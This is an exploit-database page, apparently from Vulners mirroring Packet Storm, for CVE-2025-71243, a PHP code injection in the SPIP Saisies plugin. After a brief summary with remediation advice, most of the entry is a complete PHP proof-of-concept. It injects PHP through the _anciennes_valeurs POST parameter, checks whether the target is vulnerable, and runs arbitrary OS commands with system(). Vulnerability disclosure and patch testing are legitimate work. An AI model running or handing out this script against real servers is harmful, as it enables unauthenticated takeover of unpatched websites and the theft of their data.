Vulners
Lucene search
π SPIP Saisies 5.11.0 Remote Code Execution
ποΈΒ 24 Feb 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 100Β Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2025-71243 | 19 Feb 202614:58 | β | attackerkb |
 | Exploit for CVE-2025-71243 | 19 Feb 202616:13 | β | githubexploit |
 | CVE-2025-71243 | 19 Feb 202616:31 | β | circl |
 | SPIP 代η 注ε ₯ζΌζ΄ | 19 Feb 202600:00 | β | cnnvd |
 | CVE-2025-71243 | 19 Feb 202614:58 | β | cve |
 | CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution | 19 Feb 202614:58 | β | cvelist |
 | SPIP Saisies Plugin Unauthenticated RCE | 9 Mar 202618:57 | β | metasploit |
 | SPIP Saisies - Remote Code Execution | 1 Jun 202605:38 | β | nuclei |
 | CVE-2025-71243 | 19 Feb 202616:27 | β | nvd |
| π SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 202600:00 | β | packetstorm |
10
=============================================================================================================================================
| # Title : SPIP Saisies Plugin 5.4.0-5.11..PHP Code Injection Security Analysis and Risk Overview |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : A critical PHP code injection vulnerability has been identified in the Saisies plugin for SPIP.
The issue affects versions 5.4.0 through 5.11.0 and stems from improper sanitization of user-controlled input in the _anciennes_valeurs parameter.
When improperly handled inside template rendering logic, attacker-supplied input may be interpreted as executable PHP code.
If successfully exploited, this vulnerability could lead to:
Remote Code Execution (RCE)
Arbitrary command execution
Data disclosure
Server compromise (depending on privileges)
Security teams should:
Upgrade to the latest patched version immediately
Review template rendering logic for unsafe input handling
Enforce strict input validation and output encoding
Monitor logs for anomalous POST requests targeting the affected parameter
Consider deploying a Web Application Firewall (WAF)
The vulnerability highlights the importance of secure template rendering and strict separation between user input and executable code.
[+] POC :
<?php
$options = getopt("u:c:p:", ["url:", "cmd:", "param:"]);
$target_url = $options['u'] ?? ($options['url'] ?? null);
$command = $options['c'] ?? ($options['cmd'] ?? null);
$param_name = $options['p'] ?? ($options['param'] ?? '_anciennes_valeurs');
if (!$target_url) {
die("Usage: php exploit.php -u <url> [-c <command>] [-p <parameter>]\nExample: php exploit.php -u http://site.com/spip.php?page=contact -c 'id'\n");
}
function send_request($url, $post_data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['body' => $response, 'code' => $http_code];
}
function execute_php($url, $param, $php_code) {
$start_marker = substr(md5(rand()), 0, 8);
$end_marker = substr(md5(rand()), 0, 8);
$wrapped = "echo '{$start_marker}'; {$php_code}; echo '{$end_marker}';";
$injection = "x' ?><?php {$wrapped} ?><input value='x";
$response = send_request($url, [$param => $injection]);
if (!$response['body']) return null;
$pattern = "/" . preg_quote($start_marker) . "(.*?)" . preg_quote($end_marker) . "/s";
if (preg_match($pattern, $response['body'], $matches)) {
return trim($matches[1]);
}
return null;
}
echo "[*] Targeting: $target_url\n";
echo "[*] Parameter: $param_name\n";
$test_marker = "VULN_CHECK_" . rand(100, 999);
$check_result = execute_php($target_url, $param_name, "echo '{$test_marker}';");
if ($check_result && strpos($check_result, $test_marker) !== false) {
echo "[+] Target is Vulnerable!\n";
} else {
echo "[-] Target does not seem vulnerable or parameter is incorrect.\n";
exit(1);
}
if ($command) {
echo "[*] Executing command: $command\n";
// Use base64 to avoid special character issues in commands
$cmd_payload = "system(base64_decode('" . base64_encode($command) . "'));";
$output = execute_php($target_url, $param_name, $cmd_payload);
if ($output) {
echo "[+] Result:\n$output\n";
} else {
echo "[-] Command executed but returned no output.\n";
}
} else {
echo "[!] No command specified. Use -c to execute an OS command.\n";
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 49.3
CVSS 3.19.8
EPSS0.85415
SSVC